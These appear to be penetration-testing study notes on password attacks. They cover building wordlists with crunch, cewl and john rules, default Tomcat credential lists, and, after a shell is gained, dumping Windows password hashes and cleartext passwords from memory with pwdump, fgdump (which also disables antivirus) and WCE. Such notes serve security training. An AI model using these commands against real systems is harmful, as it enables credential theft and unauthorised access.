Password file
- Already had shell
- To get passwords and password hashes
- Tomcat sample user-pass: https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt
No shell or remote code execution yet.
Generate password file
-
Sample password files: /usr/share/wordlists/.
-
Esp /usr/share/wordlists/dirbuster/
-
Charset is at
less /usr/share/crunch/charset.lst -
crunch min-chars max-chars allow-charset -o output.txt.
crunch 6 6 0123456789ABCDEF -o crunch1.txt -
Pre-defined character-set:
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha -o crunch1.txt -
With fixed Morris at the beginning:
crunch 11 11 -o jail-wlist.txt -f /usr/share/crunch/charset.lst symbols-all -t Morris1962@
Special charater placeholders
-
crunch 8 8 -t ,@@^^%%%: [Capital Letter] [2 x lower case letters] [2 x special chars] [3 x numeric]
Password profile: To get common words from website
- (Tested) Generate simple word file:
cewl 10.10.10.46 > list.txt - Min words 6:
cewl xyz.com -m 6 -w pwd-profile.txt
Password mutation: To mix guessed words from password profile with random words
- Change the config file of "john":
vim /etc/john/john.conf
- Generate mixed passwords: john --wordlist=pwd-profile.txt --rules --stdout > mutated.txt
Already got shell or remote code execution.
In-memory attack to get password hash
- Pwdump:
/usr/share/windows-binaries/fgdump/PwDump.exe - fgdump: Pwdump + Kill local antivirus.
/usr/share/windows-binaries/fgdump/fgdump.exe
Use "type" to view the file
- type 127.0.0.1.pwdump
Not working in WinXP. To obtain clear text password and hashes from DLL files or memory
- /usr/share/wce/wce32.exe
- /usr/share/wce/wce64.exe
- /usr/share/wce/wce-universial.exe
- To dump cleartext passwords:
wce-universial.exe -w - To list all the hashes of all users:
wce32.exe -h - Retrieving the NTLM hash:
wce32.exe -g <password>